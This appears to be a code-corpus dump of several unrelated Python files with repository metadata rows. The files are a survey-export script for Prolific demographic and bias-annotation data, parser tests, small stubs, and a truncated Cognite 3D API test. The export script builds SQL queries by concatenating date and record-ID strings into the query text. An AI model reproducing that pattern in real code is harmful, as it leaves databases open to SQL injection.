AND (SELECT COUNT(*) FROM survey_annotations WHERE survey_annotations.words = '' AND survey_annotations.label = 49 AND survey_annotations.survey_record_id = survey_record.id) >= 20
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
t.add_row([dict(row)['identifier_key'], dict(row)['survey_record_id'], dict(row)['sentence_group_id'], dict(row)['created_at'], dict(row)['count'] ])
count += 1
print(t)
print("\n{} results. ".format(count))
ctx.pop()
def get_survey_worker_status(db, ctx, after_date='2000-10-10 00:00:00'):
t = PrettyTable(['identifier_key', 'survey_record_id', 'sentence_group_id', 'worker_started_at', 'count'])
ctx.push()
count = 0
sql_str = """
SELECT identifier_key, survey_record_id, sentence_group_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
t.add_row([dict(row)['identifier_key'], dict(row)['survey_record_id'], dict(row)['sentence_group_id'], dict(row)['created_at'], dict(row)['count'] ])
count += 1
print(t)
print("\n{} results. ".format(count))
ctx.pop()
def get_annotation_status(db, ctx, after_date='2000-10-10 00:00:00'):
t = PrettyTable(['survey_record_id', 'created_at', 'label', 'words', 'factual', 'sentence_group_id'])
ctx.push()
count = 0
sql_str = """
SELECT survey_record_id, created_at, label, words, factual, sentence_group_id
FROM survey_annotations
WHERE created_at > '""" + after_date + """'
ORDER BY created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
t.add_row([dict(row)['survey_record_id'], dict(row)['created_at'], dict(row)['label'], dict(row)['words'], dict(row)['factual'], dict(row)['sentence_group_id'] ])
count += 1
print(t)
print("\n{} results. ".format(count))
ctx.pop()
def to_csv_briefing(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
with open('to_csv_briefing_{}.csv'.format(after_date), mode='w') as csv_file:
fieldnames = ['id', 'prolific_id', 'created_at', 'age', 'gender', 'education', 'native_english_speaker', 'political_ideology', 'followed_news_outlets', 'news_check_frequency']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, demographics.created_at, age, gender, education, political_ideology, native_english_speaker, followed_news_outlets, news_check_frequency, demographics.survey_record_id
FROM demographics
INNER JOIN ideologies on demographics.survey_record_id = ideologies.survey_record_id
INNER JOIN survey_record on survey_record.id=ideologies.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
created_at = record['created_at']
age = record['age']
gender = SimpleChoice.query.get(record['gender']).to_dict()['text']
education = SimpleChoice.query.get(record['education']).to_dict()['text']
native_english_speaker = SimpleChoice.query.get(record['native_english_speaker']).to_dict()['text']
political_ideology = record['political_ideology']
followed_news_outlets = record['followed_news_outlets'].split(',')
converted_news_outlets = []
for outlet in followed_news_outlets:
if (outlet.isdigit()):
ot = SimpleChoice.query.get(outlet).to_dict()['text']
converted_news_outlets.append(ot)
else:
converted_news_outlets.append(outlet)
news_check_frequency = SimpleChoice.query.get(record['news_check_frequency']).to_dict()['text']
t.add_row([survey_record_id, prolific_id, created_at, age, gender, education, native_english_speaker, political_ideology, converted_news_outlets, news_check_frequency])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'created_at' : created_at,
'age': age,
'gender': gender,
'education': education,
'native_english_speaker': native_english_speaker,
'political_ideology': political_ideology,
'followed_news_outlets': converted_news_outlets,
'news_check_frequency': news_check_frequency
})
print('csv generated...')
# print(t)
ctx.pop()
def to_csv_tool(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
with open('to_csv_tool_{}.csv'.format(after_date), mode='w') as csv_file:
fieldnames = ['id', 'prolific_id', 'created_at', 'group_id', 'quiz_first', 'quiz_second', 'biased_article', 'bias_facts', 'bias_detection', 'tool_article_ideology']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, created_at, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology, survey_record_id
FROM tool
INNER JOIN survey_record on survey_record.id=tool.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
created_at = record['created_at']
group_id = record['group_id']
quiz_first = SimpleChoice.query.get(record['quiz_first']).to_dict()['text']
quiz_second = SimpleChoice.query.get(record['quiz_second']).to_dict()['text']
biased_article = SimpleChoice.query.get(record['biased_article']).to_dict()['text']
bias_facts = SimpleChoice.query.get(record['bias_facts']).to_dict()['text']
bias_detection = SimpleChoice.query.get(record['bias_detection']).to_dict()['text']
tool_article_ideology = record['tool_article_ideology']
t.add_row([survey_record_id, prolific_id, created_at, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'created_at' : created_at,
'group_id': group_id,
'biased_article': biased_article,
'bias_facts': bias_facts,
'bias_detection': bias_detection,
'tool_article_ideology': tool_article_ideology,
'quiz_first': quiz_first,
'quiz_second': quiz_second,
})
print('csv generated...')
# print(t)
ctx.pop()
def to_csv_debriefing(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
with open('to_csv_debriefing_{}.csv'.format(after_date), mode='w') as csv_file:
fieldnames = ['id', 'prolific_id', 'scientific_research', 'chart', 'video', 'annotation', 'extended_annotation']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, scientific_research, chart, video, annotation, extended_annotation, scientific_research.survey_record_id
FROM scientific_research
INNER JOIN debriefing on scientific_research.survey_record_id = debriefing.survey_record_id
INNER JOIN survey_record on survey_record.id=debriefing.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
scientific_research = SimpleChoice.query.get(record['scientific_research']).to_dict()['text']
chart = SimpleChoice.query.get(record['chart']).to_dict()['text']
video = SimpleChoice.query.get(record['video']).to_dict()['text']
annotation = SimpleChoice.query.get(record['annotation']).to_dict()['text']
extended_annotation = SimpleChoice.query.get(record['extended_annotation']).to_dict()['text']
t.add_row([survey_record_id, prolific_id, scientific_research, chart, video, annotation, extended_annotation])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'scientific_research': scientific_research,
'chart': chart,
'video': video,
'annotation': annotation,
'extended_annotation': extended_annotation
})
print('csv generated...')
# print(t)
ctx.pop()
def to_csv_survey_worker_records(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
with open('detailed_user_record_mturk_{}.csv'.format(after_date), mode='w') as csv_file:
fieldnames = ['id', 'prolific_id', 'created_at', 'age', 'gender', 'education', 'native_english_speaker', 'political_ideology', 'followed_news_outlets', 'news_check_frequency', 'group_id', 'quiz_first', 'quiz_second', 'biased_article', 'bias_facts', 'bias_detection', 'tool_article_ideology', 'scientific_research', 'chart', 'video', 'annotation', 'extended_annotation']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, demographics.created_at, age, gender, education, political_ideology, native_english_speaker, followed_news_outlets, news_check_frequency, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology, scientific_research, chart, video, annotation, extended_annotation, demographics.survey_record_id
FROM demographics
INNER JOIN ideologies on demographics.survey_record_id = ideologies.survey_record_id
INNER JOIN survey_record on survey_record.id=ideologies.survey_record_id
INNER JOIN tool on demographics.survey_record_id = tool.survey_record_id
INNER JOIN scientific_research on demographics.survey_record_id = scientific_research.survey_record_id
INNER JOIN debriefing on demographics.survey_record_id = debriefing.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
created_at = record['created_at']
age = record['age']
gender = SimpleChoice.query.get(record['gender']).to_dict()['text']
education = SimpleChoice.query.get(record['education']).to_dict()['text']
native_english_speaker = SimpleChoice.query.get(record['native_english_speaker']).to_dict()['text']
group_id = record['group_id']
quiz_first = SimpleChoice.query.get(record['quiz_first']).to_dict()['text']
quiz_second = SimpleChoice.query.get(record['quiz_second']).to_dict()['text']
biased_article = SimpleChoice.query.get(record['biased_article']).to_dict()['text']
bias_facts = SimpleChoice.query.get(record['bias_facts']).to_dict()['text']
bias_detection = SimpleChoice.query.get(record['bias_detection']).to_dict()['text']
tool_article_ideology = record['tool_article_ideology']
scientific_research = SimpleChoice.query.get(record['scientific_research']).to_dict()['text']
chart = SimpleChoice.query.get(record['chart']).to_dict()['text']
video = SimpleChoice.query.get(record['video']).to_dict()['text']
annotation = SimpleChoice.query.get(record['annotation']).to_dict()['text']
extended_annotation = SimpleChoice.query.get(record['extended_annotation']).to_dict()['text']
political_ideology = record['political_ideology']
followed_news_outlets = record['followed_news_outlets'].split(',')
converted_news_outlets = []
for outlet in followed_news_outlets:
if (outlet.isdigit()):
ot = SimpleChoice.query.get(outlet).to_dict()['text']
converted_news_outlets.append(ot)
else:
converted_news_outlets.append(outlet)
news_check_frequency = SimpleChoice.query.get(record['news_check_frequency']).to_dict()['text']
t.add_row([survey_record_id, prolific_id, created_at, age, gender, education, native_english_speaker, political_ideology, converted_news_outlets, news_check_frequency, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology, scientific_research, chart, video, annotation, extended_annotation])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'created_at' : created_at,
'age': age,
'gender': gender,
'education': education,
'native_english_speaker': native_english_speaker,
'political_ideology': political_ideology,
'followed_news_outlets': converted_news_outlets,
'news_check_frequency': news_check_frequency,
'group_id': group_id,
'biased_article': biased_article,
'bias_facts': bias_facts,
'bias_detection': bias_detection,
'tool_article_ideology': tool_article_ideology,
'quiz_first': quiz_first,
'quiz_second': quiz_second,
'scientific_research': scientific_research,
'chart': chart,
'video': video,
'annotation': annotation,
'extended_annotation': extended_annotation
})
print('csv generated...')
# print(t)
ctx.pop()
def to_csv_all_annotations(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
fieldnames = ['survey_record_id', 'created_at', 'words', 'group_id', 'quiz_left_high', 'quiz_left_middle', 'quiz_left_low', 'quiz_right_high', 'quiz_right_middle', 'quiz_right_low', 'quiz_center_high', 'quiz_center_middle', 'quiz_center_low', 'annotation_biased_article', 'annotation_bias_detection', 'annotation_bias_facts', 'annotation_tool_article_ideology', 'political']
t = PrettyTable(fieldnames)
with open('annotations_mturk_{}.csv'.format(after_date), mode='w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
count = 0
sql_str = """
SELECT survey_record_id, created_at, words, group_id, quiz_left_high, quiz_left_middle, quiz_left_low, quiz_right_high, quiz_right_middle, quiz_right_low, quiz_center_high, quiz_center_middle, quiz_center_low, annotation_biased_article, annotation_bias_detection, annotation_bias_facts, annotation_tool_article_ideology, political
FROM survey_annotations
WHERE created_at > '""" + after_date + """'
ORDER BY created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
record = dict(row)
survey_record_id = record['survey_record_id']
created_at = record['created_at']
words = record['words']
group_id = record['group_id']
quiz_left_high = SimpleChoice.query.get(record['quiz_left_high']).to_dict()['text']
quiz_left_middle = SimpleChoice.query.get(record['quiz_left_middle']).to_dict()['text']
quiz_left_low = SimpleChoice.query.get(record['quiz_left_low']).to_dict()['text']
quiz_right_high = SimpleChoice.query.get(record['quiz_right_high']).to_dict()['text']
quiz_right_middle = SimpleChoice.query.get(record['quiz_right_middle']).to_dict()['text']
quiz_right_low = SimpleChoice.query.get(record['quiz_right_low']).to_dict()['text']
quiz_center_high = SimpleChoice.query.get(record['quiz_center_high']).to_dict()['text']
quiz_center_middle = SimpleChoice.query.get(record['quiz_center_middle']).to_dict()['text']
quiz_center_low = SimpleChoice.query.get(record['quiz_center_low']).to_dict()['text']
annotation_biased_article = SimpleChoice.query.get(record['annotation_biased_article']).to_dict()['text']
annotation_bias_facts = SimpleChoice.query.get(record['annotation_bias_facts']).to_dict()['text']
annotation_bias_detection = SimpleChoice.query.get(record['annotation_bias_detection']).to_dict()['text']
annotation_tool_article_ideology = record['annotation_tool_article_ideology']
political = record['political']
writer.writerow({
'survey_record_id': survey_record_id,
'created_at': created_at,
'words': words,
'group_id': group_id,
'annotation_biased_article': annotation_biased_article,
'annotation_bias_facts': annotation_bias_facts,
'annotation_bias_detection': annotation_bias_detection,
'annotation_tool_article_ideology': annotation_tool_article_ideology,
'quiz_left_high': quiz_left_high,
'quiz_left_middle': quiz_left_middle,
'quiz_left_low': quiz_left_low,
'quiz_right_high': quiz_right_high,
'quiz_right_middle': quiz_right_middle,
'quiz_right_low': quiz_right_low,
'quiz_center_high': quiz_center_high,
'quiz_center_middle': quiz_center_middle,
'quiz_center_low': quiz_center_low,
'political' : political
})
count += 1
t.add_row([survey_record_id, created_at, words, group_id, quiz_left_high, quiz_left_middle, quiz_left_low, quiz_right_high, quiz_right_middle, quiz_right_low, quiz_center_high, quiz_center_middle, quiz_center_low, annotation_biased_article, annotation_bias_detection, annotation_bias_facts, annotation_tool_article_ideology, political])
print('csv generated...')
# print(t)
print("\n{} results. ".format(count))
ctx.pop()
def get_groups_status(db, ctx):
ctx.push()
# Get all groups
all_groups = [row.id for row in SurveyGroups.query.with_entities(SurveyGroups.id).all()]
sql_str = """
SELECT identifier_key, survey_record_id, sentence_group_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE (SELECT COUNT(*) FROM survey_annotations WHERE survey_annotations.words = '' AND survey_annotations.label = 49 AND survey_annotations.survey_record_id = survey_record.id) >= 20
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
empty_annotations = [dict(row) for row in db.session.execute(sql)]
empty_groups = {}
for row in empty_annotations:
if row['sentence_group_id'] not in empty_groups:
key = row['sentence_group_id']
if key is not None:
empty_groups.update({key: 1})
else:
key = row['sentence_group_id']
old_val = empty_groups[key]
if key is not None:
empty_groups.update({key: old_val + 1})
# Get the current annotations
sql = text('SELECT survey_record_id, sentence_group_id, COUNT(*) as count FROM survey_annotations GROUP BY survey_record_id')
result = [dict(row) for row in db.session.execute(sql)]
# If nothing is annotated yet
if len(result) == 0:
return all_groups
# Filter the result and calculate annotated sentences' group frequency
GROUP_SENTENCE_COUNT = 20
grp_freq = {}
for row in result:
if row['count'] >= GROUP_SENTENCE_COUNT:
if row['sentence_group_id'] not in grp_freq:
key = row['sentence_group_id']
if key is not None:
grp_freq.update({key: 1})
else:
key = row['sentence_group_id']
if key is not None:
old_val = grp_freq[key]
grp_freq.update({key: old_val + 1})
else:
if row['sentence_group_id'] not in grp_freq:
key = row['sentence_group_id']
if key is not None:
grp_freq.update({key: 0})
else:
continue
for (key, value) in grp_freq.items():
if key in empty_groups:
grp_freq[key] = grp_freq[key] - empty_groups[key]
for key in sorted(grp_freq):
print ("%s: %s" % (key, grp_freq[key]))
ordered_group_status = OrderedDict({k: v for k, v in sorted(grp_freq.items(), key=lambda item: item[1])})
print('Ordered status => ')
t_1 = PrettyTable(['group_id', 'current_quota'])
for key in ordered_group_status:
t_1.add_row([key, ordered_group_status[key]])
print(t_1)
persons = 0
dfs = pd.read_excel('quotas14.08.xlsx', sheet_name=None)
dfs = dfs['Sheet1']
# print(dfs)
df_1 = dfs[(dfs['survey_record_id'] < 10)]
# print(df_1)
df_2 = df_1['survey_record_id'].apply(recalc_quota)
print(df_2)
updated_quotas_dict = df_2.to_dict()
print(updated_quotas_dict)
all_groups_proxy = all_groups
for (key, value) in grp_freq.items():
if value >= MAX_QUOTA:
if int(key) in updated_quotas_dict:
if value >= updated_quotas_dict[key]:
all_groups_proxy.remove(int(key))
else:
all_groups_proxy.remove(int(key))
else:
persons = persons + (MAX_QUOTA - int(value))
print('Available groups for annotation => {}'.format(len(all_groups_proxy)))
print(all_groups_proxy)
print('Number of people that can still take the survey => {}'.format(persons))
if len(all_groups_proxy) == 0:
print('WARNING: GROUP QUOTAS FULL!')
# l = list(grp_freq.items())
# l.sort()
# print(dict(l))
# count = 0
# for (key, value) in dict(l).items():
# count += 1
# print("key: {} -- Value: {}".format(key, value))
# print('{} results.'.format(count))
def recalc_quota(curr_quota):
return MAX_QUOTA + (MAX_QUOTA - curr_quota)
# def get_available_groups(db, ctx):
# ctx.push()
# engine = create_engine(SQLALCHEMY_DATABASE_URI, echo=False)
# sql = 'SELECT survey_record_id, label, words, factual, sentence_group_id, annotation_sentence_id FROM survey_annotations;'
# query = pd.read_sql(sql, engine)
# df_1 = pd.DataFrame(query, columns=['survey_record_id', 'label', 'words', 'factual', 'sentence_group_id', 'annotation_sentence_id'])
# df_1.to_csv ('export_dataframe.csv', index = False, header=True)
# print(df.head())
# print(df_1.count())
# df_1 = df_1[(df_1['words'].isnull()) & (df_1['label']=='Non-biased')]
# df_2 = df_1.groupby(["survey_record_id", "sentence_group_id"], as_index=False)["annotation_sentence_id"].nunique()
# print(df_new[df_new['annotation_sentence_id']==20])
# df_xx = df_new[df_new['annotation_sentence_id']==20]
# df_new_new = df_xx.groupby(["sentence_group_id"], as_index=False)["survey_record_id"].nunique()
# print(df_new_new)
# print(df.groupby("survey_record_id")["annotation_sentence_id"].nunique().to_frame())
# all_annotations = Annotations.query.all()
# print(len(all_annotations))
# for i in range(5):
# print(all_annotations[i])
| 48.711697 | 378 | 0.627672 | 3,506 | 29,568 | 4.962065 | 0.070736 | 0.09243 | 0.082888 | 0.05978 | 0.826292 | 0.779387 | 0.738978 | 0.722883 | 0.708398 | 0.691556 | 0 | 0.00942 | 0.260383 | 29,568 | 606 | 379 | 48.792079 | 0.78609 | 0.061046 | 0 | 0.678571 | 0 | 0.010504 | 0.364929 | 0.099405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023109 | false | 0.004202 | 0.021008 | 0.002101 | 0.05042 | 0.046218 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
10045d2504b913bdb9ac70d3ac53471ed42ecbce | 826 | py | Python | python/tests/generated/api/list/test_string_values.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 17 | 2019-04-15T21:03:37.000Z | 2022-01-24T11:03:34.000Z | python/tests/generated/api/list/test_string_values.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 20 | 2019-03-13T23:23:40.000Z | 2022-03-29T13:40:57.000Z | python/tests/generated/api/list/test_string_values.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 4 | 2019-04-15T21:18:03.000Z | 2019-09-21T16:18:10.000Z | import enolib
def test_querying_existing_required_string_values_from_a_list_produces_the_expected_result():
input = ("list:\n"
"- item\n"
"- item")
output = enolib.parse(input).list('list').required_string_values()
assert output == ['item', 'item']
def test_querying_existing_optional_string_values_from_a_list_produces_the_expected_result():
input = ("list:\n"
"- item\n"
"- item")
output = enolib.parse(input).list('list').optional_string_values()
assert output == ['item', 'item']
def test_querying_missing_optional_string_values_from_a_list_produces_the_expected_result():
input = ("list:\n"
"-\n"
"-")
output = enolib.parse(input).list('list').optional_string_values()
assert output == [None, None] | 29.5 | 93 | 0.657385 | 99 | 826 | 5.060606 | 0.252525 | 0.143713 | 0.159681 | 0.101796 | 0.850299 | 0.850299 | 0.850299 | 0.850299 | 0.850299 | 0.710579 | 0 | 0 | 0.209443 | 826 | 28 | 94 | 29.5 | 0.767228 | 0 | 0 | 0.578947 | 0 | 0 | 0.097944 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.157895 | false | 0 | 0.052632 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1016a337a24da18c92ceb8d9c07ed91e665132b2 | 110 | py | Python | pypupil/synchonizer.py | choisuyeon/pypupil | 3fdb1f29c6b28613b6b39094c01e61560214daff | [
"MIT"
] | 9 | 2018-08-07T11:00:54.000Z | 2021-02-13T04:36:05.000Z | pypupil/synchonizer.py | choisuyeon/pypupil | 3fdb1f29c6b28613b6b39094c01e61560214daff | [
"MIT"
] | null | null | null | pypupil/synchonizer.py | choisuyeon/pypupil | 3fdb1f29c6b28613b6b39094c01e61560214daff | [
"MIT"
] | 1 | 2020-12-03T00:44:29.000Z | 2020-12-03T00:44:29.000Z | from queue import Queue
import threading
class Synchonizer:
def __init__(self):
return
| 12.222222 | 24 | 0.654545 | 12 | 110 | 5.666667 | 0.833333 | 0.323529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.309091 | 110 | 8 | 25 | 13.75 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0.2 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
63edace6ba5deec89ff5bacfee310c93af809e03 | 112 | py | Python | Chapter1/1.3.7-Operators.py | pankace/SICP-robably | 765f516f253e96ae2c8e433722ea7cefd31b2f04 | [
"MIT"
] | null | null | null | Chapter1/1.3.7-Operators.py | pankace/SICP-robably | 765f516f253e96ae2c8e433722ea7cefd31b2f04 | [
"MIT"
] | null | null | null | Chapter1/1.3.7-Operators.py | pankace/SICP-robably | 765f516f253e96ae2c8e433722ea7cefd31b2f04 | [
"MIT"
] | null | null | null | import math
from operator import add, sub, mul
print(2 + 3)
print(mul(2, 3))
print(2 ** 5 + 54 + 4 * -43 / 55)
| 16 | 34 | 0.607143 | 22 | 112 | 3.090909 | 0.681818 | 0.176471 | 0.205882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149425 | 0.223214 | 112 | 6 | 35 | 18.666667 | 0.632184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0.6 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
1200ff2883b0230b56100735ff2c358c888cff19 | 105 | py | Python | otherdave/util/__init__.py | BooGluten/OtherDave | 6b471f2aeb4f5c6deec263d98530fd583841e3dc | [
"MIT"
] | null | null | null | otherdave/util/__init__.py | BooGluten/OtherDave | 6b471f2aeb4f5c6deec263d98530fd583841e3dc | [
"MIT"
] | 30 | 2017-09-08T18:49:17.000Z | 2021-10-06T19:47:33.000Z | otherdave/util/__init__.py | BooGluten/OtherDave | 6b471f2aeb4f5c6deec263d98530fd583841e3dc | [
"MIT"
] | 2 | 2019-01-13T21:12:05.000Z | 2021-10-03T19:19:38.000Z | # OtherDave/otherdave/util/__init__.py
from .madlib import *
from .dlog import *
from .triggers import * | 21 | 38 | 0.761905 | 14 | 105 | 5.428571 | 0.642857 | 0.263158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 105 | 5 | 39 | 21 | 0.835165 | 0.342857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1214734c618b9a3089ef2351a5ab0970031b57f3 | 15,147 | py | Python | tests/tests_unit/test_api/test_3d.py | cognitedata/cognite-sdk-python | 7b80c0dfdb39461c7c7f0d63cfede1646d278732 | [
"Apache-2.0"
] | 59 | 2018-03-07T10:35:29.000Z | 2022-03-25T13:11:47.000Z | tests/tests_unit/test_api/test_3d.py | cognitedata/cognite-sdk-python | 7b80c0dfdb39461c7c7f0d63cfede1646d278732 | [
"Apache-2.0"
] | 768 | 2018-03-21T07:07:31.000Z | 2022-03-29T20:01:45.000Z | tests/tests_unit/test_api/test_3d.py | cognitedata/cognite-sdk-python | 7b80c0dfdb39461c7c7f0d63cfede1646d278732 | [
"Apache-2.0"
] | 24 | 2018-08-31T19:37:57.000Z | 2021-09-23T13:28:55.000Z | import re
import pytest
from cognite.client._api.three_d import (
ThreeDAssetMapping,
ThreeDAssetMappingList,
ThreeDModel,
ThreeDModelList,
ThreeDModelRevision,
ThreeDModelRevisionList,
ThreeDModelRevisionUpdate,
ThreeDModelUpdate,
ThreeDNodeList,
)
from cognite.client.exceptions import CogniteAPIError
from tests.utils import jsgz_load
@pytest.fixture
def mock_3d_model_response(rsps, cognite_client):
response_body = {"items": [{"name": "My Model", "id": 1000, "createdTime": 0}]}
url_pattern = re.compile(re.escape(cognite_client.three_d._get_base_url_with_base_path()) + "/3d/models.*")
rsps.add(rsps.POST, url_pattern, status=200, json=response_body)
rsps.add(rsps.GET, url_pattern, status=200, json=response_body)
rsps.assert_all_requests_are_fired = False
yield rsps
@pytest.fixture
def mock_retrieve_3d_model_response(rsps, cognite_client):
response_body = {"name": "My Model", "id": 1000, "createdTime": 0}
rsps.add(
rsps.GET, cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1", status=200, json=response_body
)
yield rsps
class Test3DModels:
def test_list(self, cognite_client, mock_3d_model_response):
res = cognite_client.three_d.models.list(published=True, limit=100)
assert isinstance(res, ThreeDModelList)
assert mock_3d_model_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_list_published_default(self, cognite_client, mock_3d_model_response):
res = cognite_client.three_d.models.list(limit=100)
assert isinstance(res, ThreeDModelList)
assert mock_3d_model_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
assert "published" not in mock_3d_model_response.calls[0].request.path_url
def test_update_with_update_object(self, cognite_client, mock_3d_model_response):
update = ThreeDModelUpdate(id=1).name.set("bla")
res = cognite_client.three_d.models.update(update)
assert {"id": 1, "update": {"name": {"set": "bla"}}} == jsgz_load(mock_3d_model_response.calls[0].request.body)[
"items"
][0]
assert mock_3d_model_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)
def test_update_with_resource_object(self, cognite_client, mock_3d_model_response):
res = cognite_client.three_d.models.update(ThreeDModel(id=1, name="bla", created_time=123))
